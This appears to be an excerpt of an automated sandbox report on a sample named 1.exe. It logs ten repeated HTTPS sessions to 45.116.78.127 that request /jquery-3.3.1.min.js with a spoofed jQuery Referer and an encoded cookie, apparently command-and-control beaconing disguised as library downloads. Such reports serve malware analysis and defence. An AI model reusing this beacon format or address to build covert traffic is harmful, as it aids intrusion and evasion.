                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:45 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:44 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:45 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.54990645.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:46 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:47 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:46 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:47 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.54991845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:48 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:48 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:48 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:48 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.54993345.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:50 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:50 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:50 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:50 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.54994545.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:52 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:53 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:53 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:53 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.54996245.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:54 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:55 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:55 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:55 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.54997845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:56 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:57 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:57 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:57 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.54998945.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:58 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:59 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:58 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:59 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.55000345.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:00 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:01 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:00 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:01 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.55000445.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:02 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:03 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:02 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:03 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.55000545.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:04 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:04 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:04 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:04 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
